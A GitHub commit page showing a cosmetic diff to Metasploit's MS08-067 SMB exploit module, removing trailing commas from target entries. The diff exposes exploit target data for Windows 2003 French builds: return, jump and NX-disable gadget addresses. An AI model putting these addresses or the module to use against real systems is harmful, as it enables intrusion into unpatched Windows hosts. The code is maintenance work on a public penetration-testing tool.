Skip to content

Commit 61ad4ad

Browse files
committed
Delete commas
1 parent c7cda25 commit 61ad4ad

File tree

1 file changed

+4
-4
lines changed

1 file changed

+4
-4
lines changed

modules/exploits/windows/smb/ms08_067_netapi.rb

Lines changed: 4 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -626,7 +626,7 @@ def initialize(info = {})
626626
[ 'Windows 2003 SP1 French (NO NX)',
627627
{
628628
'Ret' => 0x71ac1c40 ,
629-
'Scratch' => 0x00020408,
629+
'Scratch' => 0x00020408
630630
}
631631
], # JMP ESI WS2HELP.DLL
632632

@@ -638,7 +638,7 @@ def initialize(info = {})
638638
'RetPop' => 0x7CB47CF4, # push ESI, pop EBP, ret 4 @SHELL32.DLL
639639
'JmpESP' => 0x7C98FED3, # jmp ESP @NTDLL.DLL
640640
'DisableNX' => 0x7C95E413, # NX disable @NTDLL.DLL
641-
'Scratch' => 0x00020408,
641+
'Scratch' => 0x00020408
642642
}
643643
],
644644

@@ -722,7 +722,7 @@ def initialize(info = {})
722722
[ 'Windows 2003 SP2 French (NO NX)',
723723
{
724724
'Ret' => 0x71AC2069,
725-
'Scratch' => 0x00020408,
725+
'Scratch' => 0x00020408
726726
}
727727
], # CALL ESI WS2HELP.DLL
728728

@@ -734,7 +734,7 @@ def initialize(info = {})
734734
'RetPop' => 0x7CB3E84E, # push ESI, pop EBP, ret @SHELL32.DLL
735735
'JmpESP' => 0x7C98A01B, # jmp ESP @NTDLL.DLL
736736
'DisableNX' => 0x7C95F517, # NX disable @NTDLL.DLL
737-
'Scratch' => 0x00020408,
737+
'Scratch' => 0x00020408
738738
}
739739
],
740740

0 commit comments

Comments
 (0)